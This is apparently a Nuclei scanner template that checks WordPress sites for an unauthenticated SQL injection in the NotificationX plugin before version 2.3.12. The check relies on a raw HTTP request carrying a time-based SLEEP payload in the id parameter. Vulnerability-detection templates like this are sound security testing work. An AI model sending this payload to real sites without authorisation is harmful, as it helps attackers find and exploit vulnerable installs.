Files
nuclei-templates/http/vulnerabilities/wordpress/notificationx-sqli.yaml
2025-10-26 16:17:37 +00:00

44 lines
1.5 KiB
YAML

id: notificationx-sqli
info:
name: NotificationX < 2.3.12 - SQL Injection
author: theamanrawat
severity: high
description: |
The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks.
remediation: Fixed in version 2.3.12
reference:
- https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb
- https://wordpress.org/plugins/notificationx/
metadata:
verified: true
max-request: 2
tags: time-based-sqli,wpscan,sqli,wp,wp-plugin,wordpress,notificationx-sql-injection,vuln
http:
- raw:
- |
GET /wp-json/ HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 10s
GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 401'
- 'contains(content_type, "application/json")'
- 'contains(body, "There is no notification created with this id")'
condition: and
extractors:
- type: regex
name: apikey
group: 1
regex:
- '"home":"(.*?)",'
internal: true
# digest: 490a00463044022070767f4c549fc7656d87b3534d8d7029a67c66ddee88f6346ec9bd6e3ce25a9102204bf528e52a7bacbbe77294a58c8b50f6b8693081f99171f1a7dade8dcaa54643:922c64590222798bb761d5b6d8e72950